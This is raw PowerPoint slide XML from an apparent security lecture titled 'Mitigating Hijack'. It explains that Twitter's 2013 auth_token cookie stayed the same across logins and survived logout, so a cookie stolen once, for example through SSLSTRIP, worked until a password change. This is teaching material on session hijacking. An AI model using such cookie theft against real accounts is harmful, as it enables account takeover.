              <a:gd name="T42" fmla="*/ 8560573 w 8678545"/>
              <a:gd name="T43" fmla="*/ 95288 h 2179954"/>
              <a:gd name="T44" fmla="*/ 8591705 w 8678545"/>
              <a:gd name="T45" fmla="*/ 126812 h 2179954"/>
              <a:gd name="T46" fmla="*/ 8619003 w 8678545"/>
              <a:gd name="T47" fmla="*/ 161856 h 2179954"/>
              <a:gd name="T48" fmla="*/ 8642116 w 8678545"/>
              <a:gd name="T49" fmla="*/ 200074 h 2179954"/>
              <a:gd name="T50" fmla="*/ 8660698 w 8678545"/>
              <a:gd name="T51" fmla="*/ 241107 h 2179954"/>
              <a:gd name="T52" fmla="*/ 8674420 w 8678545"/>
              <a:gd name="T53" fmla="*/ 284605 h 2179954"/>
              <a:gd name="T54" fmla="*/ 8682896 w 8678545"/>
              <a:gd name="T55" fmla="*/ 330212 h 2179954"/>
              <a:gd name="T56" fmla="*/ 8685798 w 8678545"/>
              <a:gd name="T57" fmla="*/ 377573 h 2179954"/>
              <a:gd name="T58" fmla="*/ 8685798 w 8678545"/>
              <a:gd name="T59" fmla="*/ 1831241 h 2179954"/>
              <a:gd name="T60" fmla="*/ 8682896 w 8678545"/>
              <a:gd name="T61" fmla="*/ 1878605 h 2179954"/>
              <a:gd name="T62" fmla="*/ 8674420 w 8678545"/>
              <a:gd name="T63" fmla="*/ 1924212 h 2179954"/>
              <a:gd name="T64" fmla="*/ 8660698 w 8678545"/>
              <a:gd name="T65" fmla="*/ 1967711 h 2179954"/>
              <a:gd name="T66" fmla="*/ 8642116 w 8678545"/>
              <a:gd name="T67" fmla="*/ 2008742 h 2179954"/>
              <a:gd name="T68" fmla="*/ 8619003 w 8678545"/>
              <a:gd name="T69" fmla="*/ 2046960 h 2179954"/>
              <a:gd name="T70" fmla="*/ 8591705 w 8678545"/>
              <a:gd name="T71" fmla="*/ 2082004 h 2179954"/>
              <a:gd name="T72" fmla="*/ 8560573 w 8678545"/>
              <a:gd name="T73" fmla="*/ 2113526 h 2179954"/>
              <a:gd name="T74" fmla="*/ 8525954 w 8678545"/>
              <a:gd name="T75" fmla="*/ 2141167 h 2179954"/>
              <a:gd name="T76" fmla="*/ 8488223 w 8678545"/>
              <a:gd name="T77" fmla="*/ 2164577 h 2179954"/>
              <a:gd name="T78" fmla="*/ 8447695 w 8678545"/>
              <a:gd name="T79" fmla="*/ 2183400 h 2179954"/>
              <a:gd name="T80" fmla="*/ 8404747 w 8678545"/>
              <a:gd name="T81" fmla="*/ 2197282 h 2179954"/>
              <a:gd name="T82" fmla="*/ 8359701 w 8678545"/>
              <a:gd name="T83" fmla="*/ 2205871 h 2179954"/>
              <a:gd name="T84" fmla="*/ 8312936 w 8678545"/>
              <a:gd name="T85" fmla="*/ 2208814 h 2179954"/>
              <a:gd name="T86" fmla="*/ 372868 w 8678545"/>
              <a:gd name="T87" fmla="*/ 2208814 h 2179954"/>
              <a:gd name="T88" fmla="*/ 326091 w 8678545"/>
              <a:gd name="T89" fmla="*/ 2205871 h 2179954"/>
              <a:gd name="T90" fmla="*/ 281045 w 8678545"/>
              <a:gd name="T91" fmla="*/ 2197282 h 2179954"/>
              <a:gd name="T92" fmla="*/ 238104 w 8678545"/>
              <a:gd name="T93" fmla="*/ 2183400 h 2179954"/>
              <a:gd name="T94" fmla="*/ 197571 w 8678545"/>
              <a:gd name="T95" fmla="*/ 2164577 h 2179954"/>
              <a:gd name="T96" fmla="*/ 159840 w 8678545"/>
              <a:gd name="T97" fmla="*/ 2141167 h 2179954"/>
              <a:gd name="T98" fmla="*/ 125238 w 8678545"/>
              <a:gd name="T99" fmla="*/ 2113526 h 2179954"/>
              <a:gd name="T100" fmla="*/ 94091 w 8678545"/>
              <a:gd name="T101" fmla="*/ 2082004 h 2179954"/>
              <a:gd name="T102" fmla="*/ 66793 w 8678545"/>
              <a:gd name="T103" fmla="*/ 2046960 h 2179954"/>
              <a:gd name="T104" fmla="*/ 43695 w 8678545"/>
              <a:gd name="T105" fmla="*/ 2008742 h 2179954"/>
              <a:gd name="T106" fmla="*/ 25099 w 8678545"/>
              <a:gd name="T107" fmla="*/ 1967711 h 2179954"/>
              <a:gd name="T108" fmla="*/ 11377 w 8678545"/>
              <a:gd name="T109" fmla="*/ 1924212 h 2179954"/>
              <a:gd name="T110" fmla="*/ 2902 w 8678545"/>
              <a:gd name="T111" fmla="*/ 1878605 h 2179954"/>
              <a:gd name="T112" fmla="*/ 0 w 8678545"/>
              <a:gd name="T113" fmla="*/ 1831241 h 21799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678545" h="2179954">
                <a:moveTo>
                  <a:pt x="0" y="1806856"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="372546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2902" y="325815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11377" y="280815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25076" y="237897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43649" y="197410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66747" y="159702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94022" y="125123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125123" y="94022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159702" y="66747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197410" y="43649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237897" y="25076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280815" y="11377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325815" y="2902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8305954" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8352686" y="2902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8397686" y="11377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8440605" y="25076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8481093" y="43649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8518801" y="66747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8553381" y="94022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8584483" y="125123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8611758" y="159702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8634857" y="197410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8653430" y="237897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8667129" y="280815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8675605" y="325815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8678507" y="372546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8678507" y="1806856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8675605" y="1853588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8667129" y="1898588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8653430" y="1941506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8634857" y="1981993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8611758" y="2019701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8584483" y="2054279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8553381" y="2085380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8518801" y="2112654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8481093" y="2135752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8440605" y="2154324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8397686" y="2168022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8352686" y="2176497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8305954" y="2179400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372546" y="2179400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325815" y="2176497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280815" y="2168022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237897" y="2154324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197410" y="2135752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159702" y="2112654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125123" y="2085380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94022" y="2054279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66747" y="2019701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43649" y="1981993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25076" y="1941506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11377" y="1898588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2902" y="1853588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1806856"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="39290">
            <a:solidFill>
              <a:srgbClr val="C82506"/>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500" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52BEE75-0D2C-ED4B-B733-B0ECE7793D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6388100" y="5372100"/>
            <a:ext cx="3111500" cy="2070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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FEC03D0-94E3-7449-91A6-9EF745C2AE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="7435850"/>
            <a:ext cx="4297363" cy="158750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://northshorekid.com/event/meet-mouse-if-you-give-mouse-cookie</a:t>
            </a:r>
            <a:endParaRPr sz="10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DE193A1-7445-D74F-8EE5-2357EA95DC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1334328" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="80" dirty="0"/>
              <a:t>Mitigating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="70" dirty="0"/>
              <a:t>Hijack</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0056A6C-6F18-AC4A-B316-DE38A56949CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2228850"/>
            <a:ext cx="147637"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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8F357BC-6DCF-E743-AAAB-2CE013BCC117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="2178050"/>
            <a:ext cx="4864100" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sad </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>story: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(2013)</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C941388-4CE5-284C-BEBD-3C59E5A41FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2667000"/>
            <a:ext cx="147637"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6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB33EAE-9ACC-1D47-A166-6C1752F93A77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="2667000"/>
            <a:ext cx="7366000" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Uses one </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>auth_token</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>) to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F2B3FC-B40C-7B48-9F4F-AFB0E8315C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3205163"/>
            <a:ext cx="149225" cy="293687"/>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dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B6E44EA-E5AA-044F-861A-63C08C6E40FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422400" y="3200400"/>
            <a:ext cx="5969000" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>username,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D916C0F3-62AF-0842-8214-3C8D5B9FB601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4330700"/>
            <a:ext cx="147637"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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD94730-F260-DE42-A3DC-30AD4777021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="4286250"/>
            <a:ext cx="7902575" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" i="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Does not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" i="1" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>change </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>one </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>login </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{233A6DE0-595D-E644-BC31-C5B240B5EB62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4868863"/>
            <a:ext cx="149225" cy="293687"/>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12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F2CDB0B-DCA4-7541-9E02-85B9ED460E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5407025"/>
            <a:ext cx="149225" cy="293688"/>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64525" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94271CAB-4259-664A-8D28-C5EFD1378D26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1422400" y="4556125"/>
            <a:ext cx="84709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41000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" i="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Does not become invalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>when the user logs out  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="141000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Steal this cookie once, works until pwd change (for example, using technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>"SSLSTRIP"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2500">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86BC56FC-81C7-E846-8318-AD9C5629676A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="6189663"/>
            <a:ext cx="147637" cy="293687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
